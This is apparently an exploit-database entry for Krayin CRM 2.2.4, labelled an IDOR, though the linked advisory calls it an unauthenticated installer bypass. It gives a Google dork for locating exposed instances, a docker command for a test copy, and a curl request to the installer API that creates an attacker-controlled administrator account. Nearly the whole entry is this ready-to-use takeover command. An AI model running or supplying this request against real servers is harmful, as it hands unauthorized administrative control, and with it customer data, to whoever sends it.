Krayin CRM 2.2.4 – IDOR
Proof of Concept (PoC)
poc.sh
# Exploit Title: Krayin CRM 2.2.4 - IDOR
# Google Dork: inurl:"/admin/login" "Krayin"
# Date: 27/09/2026
# Exploit Author: bl4dsc4n
# Vendor Homepage: https://github.com/krayin/laravel-crm
# Software Link: https://github.com/krayin/laravel-crm/archive/refs/tags/v2.2.4.zip
# Version: ≤ 2.2.4
# Tested on: docker + Ubuntu 24.04.4 LTS
# CVE : CVE-2026-100885
# PoC https://github.com/carlosalbertotuma/advisory/blob/main/advisory-07-Unauthenticated-InstallerBypass.md
#
# docker run -d -p 8888:80 --name Krayin.2.2.4 bladscan/krayin:2.2.4
#
curl -i -X POST "http://TARGET:8888/install/api/admin-config-setup"
-H "X-Requested-With: XMLHttpRequest"
--data-urlencode "admin=PwnedAdmin"
--data-urlencode "[email protected]"
--data-urlencode "password=Pwned12345"